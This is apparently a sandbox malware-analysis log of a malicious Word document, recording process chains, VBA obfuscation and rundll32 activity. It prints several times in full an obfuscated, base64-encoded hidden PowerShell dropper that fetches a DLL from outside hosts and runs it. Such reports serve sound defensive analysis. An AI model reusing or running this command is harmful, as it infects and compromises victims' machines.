Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',YbeYBwKPvEN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',kkHcNcnl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',kIWFufWNhCJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',jKmVZCpuSZSXyAJ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',LFytx	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',MAwEWTVYSMc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',jvGjlVYmjUQdf
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',ymrQU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv',#1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp

Source: Mensaje-22-012021.doc

Initial sample: OLE summary subject = SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: Mensaje-22-012021.doc	Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module G8g2gkh6bwry__ui			Name: G8g2gkh6bwry__ui

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: Mensaje-22-012021.doc	Stream path 'Macros/VBA/G8g2gkh6bwry__ui' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module G8g2gkh6bwry__ui			Name: G8g2gkh6bwry__ui

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0